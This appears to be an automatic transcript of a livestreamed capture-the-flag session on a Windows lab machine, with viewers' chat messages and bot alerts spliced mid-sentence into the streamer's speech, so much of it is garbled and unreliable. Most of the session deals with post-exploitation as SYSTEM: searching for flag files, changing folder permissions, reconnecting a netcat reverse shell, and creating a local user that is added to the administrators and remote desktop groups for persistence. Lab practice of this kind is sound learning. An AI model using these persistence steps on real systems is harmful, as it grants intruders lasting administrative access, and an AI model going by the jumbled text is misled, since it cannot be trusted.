Generalissimo for 69 says.
Yay!
Do we have a shell? Yeah.
We have a shell.
Cocaine
We
1
have a
PT
shell.
says.
GG.
Translated from
So-
Latvian.
And we
We're
already
shell
know who we are,
Generalissimo for
right?
69 says.
We're anti-authority
system.
system because we knew that from the
You can do anything.
previous one.
Almost. There is no privacy.
Yeah. So, if we look now at, we should just find the user txt and root txt then. Yeah.
Cocaine 1 PT says.
Grab the flags.
I just don't know where they are on the Windows machine. I think on the desktop, right? On the desktop. So does this have a C drive?
Generalissimo
I
for 69
think you're
says.
supposed to just be able to
Easy
type.
machine.
Yeah.
Yeah, desktop.
Yeah, I agree. It's easy. Unless they calculate the 4 restarts or 3 restarts of the machine, then it's hard. It's included with restarts. So CD and oh my god, it's like users, right? Why doesn't it type? There, users. And then ls works, because this is PowerShell, right? And look at the names. I think administrator. So if we would to look at administer, no such help. Administrator, right? And desktop, and there it is. So type user.txt. Will that work? Yes. So this is the administrator's user txt.
Now the fun part.
Or what?
Find root.txt.
Yeah, but I kind of thought this would be the administrator one. I had a command for Windows to list all. So I have to.
Cocaine 1 PT says.
Oh. Text?
Generalissimo for 69 says.
I don't know. My brain
Lol.
is not awake.
Cocaine 1 PT says.
Been there.
Generalissimo for 69 says.
You think the same things.
We
Cocaine
also had
1
a
PT
super
says.
admin, right?
Dick.
Translated
And
from
right,
Dutch.
I don't need to space it because it's. So here we had a super admin. Should we look into super admin? Typing too fast? No?
Studev says.
Fix it, fix it, fix it, fix it, fix it, fix it,
Hi,
fix it, fix it,
JD,
fix it,
welcome
fix it,
in.
fix it, fix it, fix it, fix it, fix it.
Welcome in, welcome in. We're trying to find a root flag. So anyone has that command to list all text files? Or just to find the root txt, since we know the name. We have it over here.
Generalissimo 69 says.
You are system. Why do you need flags? Kappa. That's a GG.
Yeah. But we need the flag. I kind of thought
Stev says.
that there would be something here.
I need to download that video from YouTube for each time you come in.
Xi says.
Maybe tree/F.
Cocaine 1 PT says.
So where's the flag?
Yeah, I have no idea where the flag is. Maybe like System 32 or something. I don't know why no LA. Well, we can't do LA, right? It doesn't know what we're saying. I know there are ways to hide files, but we don't even know where to look. So I just think it's funny that there's a super admin user with no...
Xi says.
Try tree/F, it gives a tree directory listing.
Generalissimo 69 says.
Yeah.
Tree. So naive, smile.
Let's just see, what have we got? What if we look in Windows? Can it do like this? No. Maybe it can, but alright, no arrows. ls star.ini. I'm just exploring here. It works, it just doesn't have any text files. So we can scroll up here to see just what we have. And please help me, because I'm kind of thinking I've streamed long enough. Oh, that's stupid. Why did I do ls there? We'll have to wait for 2 days.
Xi says. GG.
Okay.
Translated from Latin.
Just wait. System 32 is crazy directory. I should have done... Oh, it finished. So, let's do that txt. ls star.txt. I want to find a way to list all. Let's Google. Or even better for this, I think, is GPT. PowerShell command to recursively list all .txt files. Right, we have another drive too. We have another drive. So we have the command, but I just realized we had the E disk. We were on the E disk from the start, so maybe that's where it would be. So we had the E, right? Oh, I have to click again. E. So Just making sure you're on where I am. That doesn't look like it. Nothing there. So let's just use our cute command here. But oh, I can't use arrows. I'll have to edit it before. I'm not making notes. I'm not making notes. So and now we're at E. So I'm thinking E is a tiny drive. So let's start with this one.
Generalissimo for 69 says.
While they're looking for root. Text me and Cocaine are talking about cannibalism. This is a family-friendly stream, so we DM
friendly. Okay. Cannibalism. Very, very family-friendly.
D.
Look,
Cocaine
look,
1PT says.
We're having progress here.
LOL.
Let's actually read while
I'm talking
scroll
about
up
meat.
here.
I'm starving.
Yes.
Generalissimo for
I
69
can see
says.
that. Well,
Sure, buddy.
why am I
Cocaine
so
1PT says.
stupid?
Need to
Why
cook
am I so
something.
stupid, people? What I want is really root.txt. I don't want anything else. Why should I list anything else? We just want root.txt. So let's give the computers a job and don't have to think.
$$$
Translated from German.
It's
She's
root.txt
doing exactly
on
same
this
commands.
drive.
Generalissimo for 69 says.
Lol.
Okay, it's exactly the same commands that you used. Okay, nothing. C. And then, oh
Cocaine
my God.
1PT says.
First try I went for that also.
Okay, so that's
But you won't get
a
nothing
nice
there.
way of saying I'm trying
Generalissimo for 69
all
says.
in vain.
Fix it hint. It's all about permissions.
Yeah. I kind of thought a bit about that when I didn't see any files in that super directory, super admin.
Cocaine 1PT says.
But I don't think I
Look
know
your permissions.
really.
For admin user.
You don't think I should start this command? Will it take forever? Should I just skip it? We won't find anything?
You won't get nothing from that.
Okay, because it would probably take more than 2 seconds. Yeah, and as I've said before, I usually don't want hints, but now it's 11 hours streaming. So my brain is not really... let's just make sure that time hasn't passed too much and the box dies, because that will be kind of annoying at this time. We have 1:37, so we're good. So let me see. What did you say? You went for that first also? You get
Generalissimo
nothing
for
there.
69
It's all about
says.
permissions.
Get a
Get ACL. Yeah, because I used to, as an administrator of servers, I used to take ownership of files to be able to fix bad permissions people had made and crazy stuff, They had limited the inheritance and crazy things. So I don't know how to do that. Like this? Or anything. So just look at the ACLs. Get ACL. But what should I get ACL on? I don't know. I don't know where to start. Get ACL is a good thing. I don't know what I'm aiming for. You know what I mean? Okay, let's go back to ChatGPT. though I don't know. There you see where I was typing E:" before. I don't know what I want. You know, that's my problem now. The file is hidden. Hidden. How since no, I don't like that. I don't know what to ask. You have to help me. Come on, people. I'm too new to trying to do Windows machines. And the file is hidden. Help. Permissions, get ACL. If I just do get ACL here on the machine.
Cocaine 1 PT says.
Okay.
Don't ask Run to get a tongue.
Generalissimo for 69
But I want to
says.
know what I'm doing. I don't know
Hello
what I'm
bot.
doing.
How to check for permissions for my user in the current path I am at in PowerShell. Kappa.
Translated from Icelandic.
Yeah, the current path. That also didn't.
Cocaine 1 PT says.
Yeah, but
That's
my
your permissions
God.
there.
So 268435456.
Generalissimo for
doesn't
69
tell me
says.
much.
For C.
Yeah.
What about other paths?
Cocaine 1 PT says.
Yeah.
Enter admin folder.
Okay. Not a super admin. Because that super admin looked kinda
Generalissimo for 69 says.
I didn't even look in the admin
Fix
one.
it if you are a system user. Can't you just add a user? Also look at your port scan of Nmap.
Okay.
You forgot about one
yeah.
open port smile.
I just followed your hints on this one because it's supposed to be hard, you know, and you said it was easy.
Christy says.
Yeah, we found the user flag. And we're in the authority system, but we don't have the root flag. So so many messages. I have to check back. Here.
You can add a user to the system. You can add him to the local admins group and also to the RDP group smile.
Yeah.
Christy says.
Let's see.
Really easy.
Generalissimo for 69
also
says.
look at your Windows port
Then just
scan.
RDP which is open on the machine smile.
Christy says.
JK.
Yeah, but do we need RDP? I mean, if it's, I feel it's just a text file on the machine. Shouldn't I just be able to find it anyway?
Generalissimo for 69
yeah, exactly.
says.
We can do without RDP.
Cocaine 1 PT says.
You don't, but it's easier for the eyes.
Yeah,
D.
okay.
Generalissimo for 69 says.
But can you check and change permissions?
What about the thing I used to do, as I told you?
Also, this
I
machine
used to,
has
in the
something funny
root,
if you
turn
RDP
on
into it.
inheritance and make myself the owner of everything on Drive. That's what I used to do as administrator.
Christy says.
A Rickroll?
Okay. So we should RDP. Because I noticed the RDP. I noticed it.
Generalissimo for 69 says.
So let's look back on the notes.
Everything is pretty good, Vector. Do it.
Okay. So looking back on the information. And actually showing you the
Christy
place.
funnier.
So, with nice colors, we have used
Cocaine 1 PT says.
the DNS.
Be
but
careful,
we have
he's
not
scary,
used.
red teamer.
Christy says.
We have
Cocaine
all
1
of
PT
these
says.
parts open. It's not just
Generalissimo for
one.
69.
You know, these are the
Christy
web
says.
ones. We've used them. We use DNS.
Generalissimo for 69 says.
But we
Cocaine
haven't
thinks
really
you
done
said something
anything
bad,
very
Christy.
Windowsy,
Cocaine 1 PT says.
except for the
He is
PowerShell.
a true
Rubber
hacker.
shell, of course.
Generalissimo for 69 says.
My response was that there is something even more funny. Cocaine is trying to eliminate my potential THM partners in advance. Wanna be my THM partner? Christy.
My god, you guys are talking so much I can't read chat. Sorry. Talk. Chat a lot. I like it. I'm just going to look at the TTS and scroll up. So that I can read the messages.
Cocaine
No,
1
it
PT
just right
says.
updates, right? So that doesn't work.
Skeptical.
Yeah, I can
Generalissimo
look at
for
the
69
chat.
says.
Yeah,
You ha
I
ha
found
ha.
the chat. So,
Translated from Tagalog. Christy says.
Ty, you are really sweet, but I don't do THM ATM.
Generalissimo
look,
for
how to
69
check for
says.
permission. Yeah.
I got rejected.
Cocaine 1 PT says.
What you do then?
Generalissimo for 69 says.
I have no
Frown,
idea
frown.
how to add a user. Or maybe I do. Maybe it's just 20 years since I did it. No, 15 years. And then add him to the local admins group.
Christy says.
But
Maybe you two cool hackers tell Sophia what to do. D.
yeah, thanks.
Cocaine 1 PT says.
But I'm kind of reading the
Net user
hints I have
slash user
gotten.
user slash ad. Something
See-
like this. If I remember.
I can just ask the ChatGPT too, but why? If I'm still gonna Google it, I can, or ask ChatGPT. I can ask people. So, yes, RDP. We could do like
Christy
RDP, but it's funnier with RDP.
So she won't transform this into a 72-hour stream, lol.
Generalissimo
Yeah,
for
right
69
there.
says.
Because I said I won't help
Net
now
user
because
slash
it's
ad Christy
late,
Generalis Imrales 123.
and I don't want to abort this one when I'm getting help.
Translated from Romanian. Cocaine 1 PT
Yeah, net
says.
user. I know
LOL.
that.
Generalissimo for 69 says.
I'm
Netlocale
just
Group
worried that
administrators
this
Christy
will
slash ad.
this will just time out when I
Netlocale
don't
Group
do
remote
anything.
desktop users Christy slash ad.
What I even didn't do,
Then
I didn't
RDP with Christy.
do get ACL here. That was the suggestion actually. So, how did
Always
you think?
make users from your stream. They will be more interested that way fix it.
Always make users from your stream. Okay, so you mean I can use any name? Okay.
Cocaine 1 PT says.
Make a user called cocaine.
Generalissimo for 69 says.
You don't deserve it, Cocaine 1 PT.
Let's be neutral here and not use one of your names. Let me just switch back to so I can actually see my OBS. And my poor family has been missing me for 11 hours and 10 minutes, right? Will we reach 12 hours? Oh my goodness. Seriously,
No.
people, it's 1930 here. Okay, let's focus. So, why would I think of making a user here? Tell me. Not just do this, do that. If I'm to learn anything anyway, then I need to know why
They
do
are
you
all
think.
useful.
Why would it be useful to make a user? We're NT authority system. Shouldn't we just be able to make sure that we have permissions at that? Are we making the user just to be able to RDP?
Fix it cause you can RDP into it.
Yeah, okay.
And then you can change permissions more easily.
Yeah.
Instead of that PowerShell syntax.
Yeah, I'm not a real friend of PowerShell. I was like when they were making it, but now it's kind of just complicated.
Cocaine 1 PT says.
3389.
Nmap had
We were just looking at it.
3,389 open, right?
Generalissimo for 69 says.
3389. Yeah,
No
it's
one is
just
a friend of
terminal
PowerShell.
services.
Microsoft did it 'cause they hate people.
I was actually following along when they were creating PowerShell and going on these web in our thingies and stuff. Yeah? Yes, good then.
Cocaine 1 PT says.
Look under the port. RDP NTLM info.
Translated from Indonesian.
My kid was asleep and just woke up, so I'm just going to check in on him a bit. So I'll be right back. Yeah, I'll be right back.
Christy says.
So whose box it is?
Generalissimo for 69 says.
Dunno. Check the room page.
Christy says.
LOL. Tiscu trolling cocaine.
Cocaine 1 PT says.
Me?
Generalissimo for 69 says.
Are you getting trolled? Cocaine 1 PT.
Cocaine 1 PT says.
He wish.
Christy says.
:D. 'Cause I thought Generalissimo to 69 you said is his box lol.
There. So I gave him some yogurt and stuff. Okay, people. So, the explanation.
Generalissimo
why.
for 69 says.
And also,
I did say that.
guys, in case you did not,
'Cause I wanted him to help.
in case you didn't
Christy says.
join the Discord. Join the
And
Discord.
stuff. D.
Join the Discord. Join the Discord.
Generalissimo for 69 says.
Attention, please.
I was lying. I'm a bad person.
So, let's go back to this. Okay? So why you said that this was interesting, and then you said that
Christy says.
why would I need
You want
why
me
would
to
I
leave
think
and join
permissions? I'm back. Please help. I'm tired.
Generalissimo for 69 says.
Yeah.
'Cause you own the deer,
Yeah.
but don't have any permissions to read it.
How would I know that I don't have permissions? 'Cause it would have showed up here.
Access.
Yeah, but how do I know it?
Only admin is there.
I know how the
Cocaine 1 PT
permissions
says.
looks, you know, in
With
Windows,
RDP
but
would be
not
easier
with
for you to understand, I
PowerShell.
believe.
Generalissimo for 69 says.
Not system.
Yeah, and it's
System owns it but doesn't have any access to it.
yeah, but how do I know that I don't have access?
Via
So-
RDP it would be easier.
Yeah, we can do RDP.
Or
I
just
just
find the
wanted to know
PowerShell
how
commands
I
for it.
would find this out by myself, you know. How would I know I don't have access? How do I know it's not just empty? You see my question?
By get a call you just did.
Yeah, but what would I have seen? Let's go to the directory we know.
If you had system user under access you'd have perms.
Cocaine 1 PT says.
Yeah, so we need to see the
Do
difference.
the Gitical
Here we have access. So if we do get
on
ACL
that
here,
bottler.
Generalissimo for 69 says.
We
Check
get
it
the
again after
same-
you'll get permissions later.
Cocaine 1 PT says.
Inside
yeah,
admin.
yeah.
Christy says.
Ikekel.
Cocaine 1 PT says.
Icicles won't work here, I
Yeah,
guess.
we have 3 dots here.
Generalissimo
We
for
don't have
69
much.
says.
Is there some way to get
You see the
full
difference?
information?
Icicles won't work for changing the perms.
Okay, so here we're also access, and here we have the admin. Okay, but I know that as a owner I can set the permissions, which would be very easy, I guess. So we would just do RDP for fun then. I will just look up the
Cocaine 1 PT says.
yeah.
Sure. That's the point. You can change it. But you don't have perms, that's the point, I guess.
Christy says.
Okay.
Ikekel C:\path/to/your /file or folder.
Generalissimo for 69 says.
Otherwise you won't get the root flag smile smile. Okay, try Icicles.
I guess I have reading to do.
Let's see.
I recognize the command. Let's say that first. set owner user. And what were your suggestions? So if I don't say the user, I set my own.
I suggest
I know.
RDP smile.
We can do both. I want to do both and learn all the things.
I can give you the PowerShell commands.
Cocaine 1 PT says.
Yeah,
X2.
okay.
Generalissimo
So
for 69 says.
if I just...
Do you want it?
Yeah, but just let me just do this first. We can change the permission and then we can RDP, right? No, we don't want to set owner. And I don't know the specifics, which means that
Maybe we didn't type the icocls command correctly. Who knows cocaine 1 PT? Maybe it will work tongue.
Okay. Hint, thank you. But we'll have to try, cause otherwise we won't learn. Cause I'm the owner of a dir in and using PS. How do I give myself full permissions to this dir?
Cocaine 1 PT says.
You are not the owner, I guess. You are system. Owner is admin.
No, I'm owner. Let's look. I'm owner. See? Owner, me, access, admin. So I'm owner, which makes it very easy. I don't even have to take ownership of it. So let's look what it says. I scrolled up too much. To give yourself full permissions to a directory in PowerShell, you can use get ACL and set ACL. Come on, here's how you do it. Get the current ACL. So, your directory. Okay, and we have done
Christy
get
says.
ACL. It's the current directory.
Owner is nt/auth system.
Pierslayer 113
Yeah,
says.
and we're NT system.
Yo, what's up?
That's who we are.
Christy says.
Hi, welcome in.
Hello Pierslayer 113.
Welcome in. So, add permission for user account to have full rule. Well, we don't need a variable. New object, system, security, access control. Oh, okay, we need to add the rule, so we need it. So, oh my god, we need to scroll. So, system security, access control, file system access rule, your username, full control, container inherit, object inherit.
Generalissimo
allow.
for 69 says.
Fix it, you need a read permission.
No, I don't.
Full
I'm
control will
owner.
work NVM. Thanks,
Yeah,
Squad.
yeah. I asked for it to give me full control, so that's why it did that. So so really we could just do this in this parenthesis, I assume, and ACL. So first, okay, it's a full script, and
Pierslayer 113 says.
Christy, hello to you too.
so make this a one-liner. So I was thinking I'll change it into one line. Why? Why do it myself? So I am Okay, why not just lazy myself more and just do who am I? And we can copy this. Am I lazy or what? Sorry for being lazy. And then we go to the left screen. And there is I'm just copying. Oh, I Control-C'd it. We have to re-get. Look. It would happen when I'm tired. Did I even manage to switch? I think so. Can I get some applause? We'll have to have an applause redeem for when I do stupid things, right? And that there is... There. Just when we got this far. So now we should have added this. So let's see that it didn't do anything strange. No.
Fixerbot says. New follower Twitch.
Welcome.
New follower Piercelayer 113.
Again, Piercelayer.
Less than 3.
Okay. So the path, but it messed up. We don't want admin to use it. We want, let's see what it said over here. Your username.
Generalissimo for 69 says.
It didn't get it. Yeah, it's system, but it should fix it. Now I'm
just system.
Yeah, so I'm telling it fix, and it should be able to fix this itself. This won't work. We would notice. I'm not sure.
Should work probably.
Yeah, because they're always short and long names.
But just system works.
Yeah, the problem is that we will have to click. We will have to reconnect. So, though it shouldn't be very hard to do it. It took some time last time. First for the file. Waiting. Did I do something strange? Like make the machine to die? Or did I type something? Oh gosh. A character is removed. Control undo. Undo?
Cocaine 1 PT says.
If port now still in use, guess you can't. But try.
Well, the port should not be in use.
Generalissimo
right?
for 69 says.
But
Fix it. That's why you should have added a user BTW for persistence.
But isn't there a way to make the shell stable more, right? But I guess connecting is a good way. But I usually don't mistype things. Usually. Anyway, I notice there's a key, so...
It's just PowerShell.
Yeah, it's just PowerShell.
No TBS here.
So if we just do who am I, we get it, that we were in the authority system. I don't know if it would have been quicker the other way, because I would still have had to, send commands. And I would have copied something, which I failed to hold shift when I copied. And then you Control-C. So really, it's a bad coincidence to have Shift Control C and Control C that close, you know. Or rather, why did we copy with Control C? That's Microsoft's problem. I blame Microsoft. So this is not the one. Is this the one I used? Yeah, so this is the one I should. Don't we have anything like this? What is this? This. Do we have a PowerShell? I can just see that. I don't know why this is like this. If we undo this one, see, their stuff disappeared.
Fiercelayer 113 says.
Now it's correct.
I blame
again.
Microsoft too, but for everything. D.
Yeah. So now we actually have the IP address there. Do you think that could help with finding the file? What do you think? Yeah, it helped with finding the file to add the actual IP address. So, C, not S. So let's go to CD users, and CD admin, and get ACL, and these are easy to remember because I have used them before, but I didn't remember anything. So now we just what I did before that I kind of failed was to copy, you know. I copied anti-authority system. So yeah, there. So it's ACL back. So this is should be correct, and I already checked that it's the correct things to do this time. So don't wait it to do something crazy.
Microsoft killed Kennedy too.
Okay. It's Microsoft's fault. It's generally just, you know, that's why the Earth is round and not on the back of a turtle. That's Microsoft's fault. We want more magic in the world. What author do I like right now? Let's paste this nice one and make sure that you can see what I'm doing. So apparently I also.
Fiercelayer 113 says.
Generalissimo to 69. Shh. Or FBI will find you amused.
Look. Now we have the files. So I was going to do LSLA here. So since I know how permissions work and I've used it as administrator in Windows for a long time, I know that you can, when you are the owner, you can do that without no problems. So, but we'll still do RDP. We won't skip RDP because it's fun. But we can just do this first. So let me just, the hardest thing here to finding the right tab to paste something into. It's done. So now we can focus on the important part, which is the learning. So also we should probably add some stuff here, like, that's not what I wanted to add though. I wanted to add this because that was kind of important. This is a mess. I don't care about the notes, I'm too tired, you know. So This is PSO Nerd2 Perms. There. Oh, right. We'll probably get lots of links and other nice things if we don't do shift. And this, the new line at the end there, automatically sent it to. So when I pasted it, it just out-worked. So, how do we add ourselves to a group?
Generalissimo for 69 says.
PS Layer 113 FBI hates them too.
Cocaine 1 PT says.
NSA is
So-
here already. That's cool.
Generalissimo for
Guess
69
what I'm
says.
calling my user.
NSA hates them too. Eternal Blue.
Cocaine 1 PT says.
:D. That's true.
Guess what I'm calling my user. Just because I was talking
Generalissimo
about
for
turtles.
69 says.
Fix
Yeah.
it GG.
Yeah,
Translated from
I know.
Latvian.
Told you it's an easy machine.
But I had to learn about the... I know how DNS works, I know how permission in Windows work, but... And I had done, the getting a file and downloading a shell thingy, but I didn't know about this DNS. I knew, of course, that you could just look at the DNS, but
Cocaine 1 PT says.
there's all these commands and all these things
SRF.
that I didn't know. So it's
Translated from
connecting
Somali.
my old knowledge with
Generalissimo
new
for
things.
69 says.
That's very nice.
Zone transfer is not very common nowadays. But SSRF is.
Yeah. And also that bit, that was like the best thing. And I'm still not... I'm have you noticed that I'm more alert now again? I don't know if it was that I ate stuff or whatever, or that I moved and helped my kid, but I'm waking up a bit again, But I was very tired there, so we'll have to look back at that. But first, let's finish it. And then I'm in RDP.
Cocaine 1 PT says.
So, new local user.
Is that
This is
why?
kind of...
Generalissimo for 69 says.
Oh my.
The XZ package, starting from versions 5.6.0 to 5.6.1, was found to contain a backdoor. This backdoor could potentially allow a malicious actor to compromise SSHD authentication, granting unauthorized access to the entire system remotely. The impact of this vulnerability affected Kali between March 26th to March 29th. If you updated your Kali installation on or after March 26th, it is crucial to apply the latest updates today to address this issue. However, if you did not update your Kali install, this just came in, D.
Okay.
On the Kali Discord channel.
FixerBot says.
Oh. Hey. Is it right that it's hate handles? Right?
Welcome Raiders. H8 Handles
Your
brought
name.
7 friends to the party. Go drop them a follow.
Oh,
New
welcome
follower
in,
Twitch.
welcome in.
New follower Lild123. Less than 3. Haka says.
Waving hand.
You're not too late. You're not too late.
Hate Handles says.
We're going to do more on
Translated from Tagalog.
It is indeed.
FixerBot says. New follower H8 Handles. Less than 3.
Welcome in. Thank you very much for the raid. I guess you were doing some
New follower Alexandre
like
30. Less
studying
than 3.
doing boxes thingy, right? How was the stream? The classic question.
Hate Handles says.
I gotta take a
okay.
stretch break and I'll be back one.
I don't know how long we'll be running because I'm at 11 hours 42 minutes. But I'm kind of in the second breath there now. We'll see. So we're going to, or let's just, we were actually asking ChatGPT some easy questions there, because, yeah, you know, Googling is more work right now, right? So let's see. We are going to add a user in RDP, because people tell me that there's fun stuff there, and also it will be stuff that I can learn, because I haven't done this in PowerShell. Oh my goodness. I'm not going to Control C again.
Generalissimo for 69 says.
Only one funny thing there, tongue.
Okay.
You'll see it as a pop-up right away.
Yeah. So, this is kind of slow. You're watching what I am, right? Actually, let's just see. Let's copy this. And
problems
add
with
it
the
to
shell
the
again.
notes.
D.
Yeah. So I'm taking the opportunity and giving it 2
Christy
seconds.
Zlil.
Translated from
And
Slovenian.
we're actually going to make some more notes, because I feel more energetic. So I haven't even added a burp one. Whatever number this will be, like 5.5. Very official, this, and logical. And let's just add this there. And this is HTTP, and it will color it nicely. Though it's added a line break there for some reason. And we have restarted it 3 times. So I'm just hoping that now when we
Concerned
swap
Doge
back
CV
to the
Hazmat.
machine.
Translated from Estonian.
I'm like, why don't I see the shell? Cause that's the Windows machine. So really, I'm thinking of just Control-Cing that, and then just running this again, and hoping that we should have started MC first. Start netcut before running stuff. So we'll see what mistake I make. We haven't got another download, but it takes time. I know it takes time. So maybe I could just have started netcat and it would have worked, because it is so slow. It's really kind of slow. Dim dim dim. What else did I do? If I'm going to make notes, what do you think, people? Did I break stuff, or is it just slow? The last one didn't go here even, so I kind of aborted it too early.
Alien Dance.
Translated from French.
No, I need more action than this, because I'm going to fall asleep if I don't.
Generalissimo for 69 says.
I did not
Did you
reset
reset
it.
the machine?
Do I need to start it
Update your
again?
host's
Is it
file.
closed when I put the flags in? Do I need to start it again? Because I have not. No, it's still there.
It's usually not.
No, it's still running.
But her having problems with it from the start.
Let's do a 4th restart, because it didn't finish. It couldn't do Who Am I in minutes, so. Or at least a minute. And for new people, we also had to log out and log in again to be able to stop the machine. So, new IP, then a bit of waiting for it to start again.
It's not that funny.
We could actually do notes.
More of a nerd's joke there.
Yeah. But, yeah. By the way, let's hop back here. I'm thinking I have lots of notes I have not made because I was tired. Look. I have lots of stuff I did not take notes. So let's call this one 7 something. 7. Find root.txt, or more like PS. Oh, sorry, I removed too much. So we have the time. So PS. We're at the terminal. Let's do. Or we could call it netcat, or we could call it something.
Meanwhile, I'll go for a while.
Yeah, okay.
Have a good night.
Okay, good night. And are you coming back, or because you're the one that wanted me to do the RDP?
I scrub. Translated from Italian.
And thank you very much. Okay, you're coming back.
Generalissimo
so if I'm
for
gone,
69
good
says.
night, and otherwise, welcome back. That later.
I'm coming back.
Thank you.
But in like an hour.
Okay. I hope that I'm not streaming in an hour.
I still need to replace cocaine. So I'll keep searching.
Okay. So let's see now. What I did actually do this for
Cocaine
E2.
1 PT says.
And we didn't find it. We did find user.txt was in let's just type it C users. Oh, wrong slash. Maybe that's easier though, because I had to double these. Users administrator desktop, and there we have the user txt. Then we went crazy looking for root txt, but we didn't find it. I didn't actually run this, but people said it was, or Generalissimo said it was not there. So then we did get ACL in different places, and let's see what the time is. We've just spent 3 minutes. We have the IP. Let's update the host file. Right, you're on the right screen, which is right. Sorry if I'm overdoing it with the right thing, but I'm tired. Yeah, I was sure I had the tab where I'd done this before. I deleted one of tab using that, which was kind of useless since we needed it again and again. And I'm going to copy, and paste. Making sure I'm actually here when I do it. This is the... Is it the 5th IP? 5th IP. We save it. I make sure that it's actually the same IP that I have there. Let's make sure that this one is running. We can restart it. And let's restart this one too, just to make sure. Though we have lots of interesting stuff prepared, so we don't want to lose it. We could actually let's add a new tab for Netcat so we can make sure that we're not losing it. We don't want to lose all the notes. So this is how tired I am. I'm like, what was I going to do? Alright, Netcat. I will. This is my longest stream ever record, definitely, because I haven't streamed for more than like 8 hours, or I think 8 hours, which is kind of long too to me. So let's see, do you think the machine is starting to wake up? This should work when it's working. 11 hours and 54 minutes. Oh. Maybe I should just... Oh look, it worked. It's just kind of slow. Sometimes I think it doesn't work, but it's just that it's slow. So I noticed that this one is actually not correct, because there shouldn't be a line break there. So this will work. And K for Kali, because I had the Windows one. So let's see if we slowly get a tiny little HTTP. There it is. It got our shell and connected. There. We're back there. So now I don't know if the user was created. So I did ask ChatGPT, since I am not... It's a long time since I... if I ever created users with PowerShell, I don't know really actually. So create a user named Pratchett, because we were talking, or I was talking
Christy
about
says,
Terry Pratchett,
GG.
you know.
translated from Latvian.
Good
Cocaine
with
1PT
CMD.
says,
Yeah,
Do it with
yeah, because
CMD.
I'm not sure
Net
if this is
user.
what broke it. Use net user. Oh look! Oh, ChatGPT gets applause for saying full name Terry Pratchett. Comment author. It knows what we're talking about. So it says this is PowerShell, and we can run this in PowerShell.
Ignore everything after slash add.
Yeah.
Not
Yeah,
needed.
so we really need this. We don't need a password. Or should we add a password? Yeah, we should add a password. So let's just do this bit. And since
password.
we can't edit stuff it could be password, but we'll have to edit it on this machine before
Yes,
we
give
paste
it one.
on the prompt. And then after this, we're going to create user. And let's there, and let's just remove these, but I can't edit the command since I don't have arrows at the shell. So press should and the wonderful password of password, and you're on that screen. Good. So let's not Control C anymore, but I have to click again. We'll see if we already have a user called Pratchett. It didn't complain. I assume it did it. So I'm just looking for my Firefox. Though it would have been kind of cool to have Terry Pratchett, but it's not useful. I have a new love for ChatGPT. Yeah, okay.
See
okay.
if users show up.
We can do it. Oh, I'm typing. I had to remember not to just switch screen for you, but to actually click on the other one. So we don't seem to have an account, so it didn't work.
Nope.
So let's just do the other one.
Run command in CMD, not PS.
Yeah, okay. Let's do it then. I guess we could just CMD here, right? Because then we'll hop into CMD. Okay, that's interesting. This account is what we got the first time. That's what we got the first time in the web.
CDC.
Translated from Hungarian.
Why do you think that would matter? And also, this is C. You don't need a CD to see. What did you mean?
What's that, CF?
What?
At being?
CF?
Not PS?
Yeah, so this
Begin.
is... Oh my goodness. At what? Yeah, I don't know. This is how it is. What if we try like version? But it's definitely, it's definitely partial. So let's see. What? Let's ask ChatGPT. I'm thinking this could be just something they've made for fun and doesn't exist anywhere else. What does CF mean? At where the PS prompt usually says, oh god, I'm good at spelling today, says PS. Command and feedback. Indicate that it's ready for a command that will provide feedback. variation. Also often used to indicate a customized or modified PowerShell prompt. Okay, so kind of both of my guesses. So I was okay with not caring about it, I guess. So we could not create a user. I don't care about the spelling error. It will understand. Oh, did I do net user? Don't I have to use CMD? Hint, hint. Sometimes it's smart, and it added Terry Pratchett, and sometimes it's stupid, or it's always stupid. So let's press Windows X. Is this, sorry if I'm boring, I think this is funny. Is this really a PS command? Yeah, exactly. Yeah. Let's use the one it suggested. What do you think? Yeah, but I'm trying to tell it to tell me, and it suggested that we command prompt admin. So it's normal ChatGPT. Okay. So I guess we'll CMDC then. Let's go back to the right one. But I just wanted it to tell me what to, just the full command, you know? Let's do one more try to make it tell us what we want. I want the full PS command for net user with CMD. Can you do it? Invoke expression command. Yes, that's a PowerShell. That's a PowerShell version to do it right. And that's what I used. C/C. So it's /C or I'm just looking at my let's look at my Windows run.
It's invoking cmd.exe.
Yeah, so these are the IX ones. Yeah, but I was thinking dash. I wasn't thinking slash. So I'm curious, can you use both? Or am I crazy? Can you use both?
It's the execute command.
Yeah, you can use both.
Yes, you can.
Okay, good. Because I was going to type that only, not invoke expression, you know. But we'll do this.
At least I used.
Now I kind of pasted it into the box I was going to paste it first into here, and you can't see because I'm in my notes, but you can just I'll be back to you soon. Command completed successfully. I'm just adding this to notes too, so we have it there. So it's nice. Yeah. But maybe we should use it the same way. Oh, I can't do up, meaning I'll have to make, because I don't want to Control C too much, you know.
Net user works here.
Yeah.
I guess.
Yeah, but...
No need to use invoke.
Yeah, but... yeah, I know it worked. But both should work. That way. And it didn't. Okay. Because we used this and it worked. So maybe it's the parameters that it has problems with. Because it's just an alias for the other thing. And it doesn't have the same. So now we have Pratchett here.
New
too.
user there.
Yeah.
Here we go.
Yes, so I'm just curious. Didn't we have... Was it just one new?
Edit to groups, administrators and remote desktop.
Oh, but look. 1, 2, 3, 4, 5, 6. 1, 2, 3, 4, 5, 6. Okay, it's just one more. Yeah, so it needs to be in administrators too. Well, of course, if we were to change permissions. And that's the reason that was originally the reason to do it. So, of course, yeah.
Netlocale group remote desktop users username/add.
Okay. I'm just doing stuff in my notes at the same time. So, okay. I kind of wanted to do also the PowerShell command, but we can just keep this open and we can try both. Just adding the comment. I'm sorry for not showing everything. It's too much to just jump back and forth all the time. I'm going to do the full thing here, I think. So
you can just put this command inside that PowerShell script you used before.
Yeah, that's what I'm doing.
WTV you prefer.
Yeah. I'm just not showing you me copying and pasting the commands. And now we have all of that. Because I can't edit the commands, so that's why. So if I paste it, I can't edit it afterwards. I'll have to retype. So we're pasting that, and I didn't change the username, so I'll have to do it again. I can't go back any further. That's also nice. So we need to have Pratchett here. Can I just do one at once? I'm just copying this line. Let's do administrators too. I can just do both commands at the same time. Oh, I happened to do Control A by mistake, which was not my meaning. Add administrators. And also, I'm starting really to feel bad about not... I need to go to my company, I need to go to my kids soon. Now I just... Command CMD. Oh, that's interesting. It just did the same thing as it did last. We just backspace there. So let's paste again and run the remote desktop users add. And I'll run the other one. And then we'll do net local group. Let's see if that shows anything. And I'll just copy this and we'll paste this. And apparently the alias for this works, because I assume that's why it works. Of course, we should probably have looked at like the users groups. How do we do that? but here we have the names administrators. I hope I spelled it right. And we have remote desktop users. Right, can I do like oh my goodness, I'm doing arrow up. I'm thinking
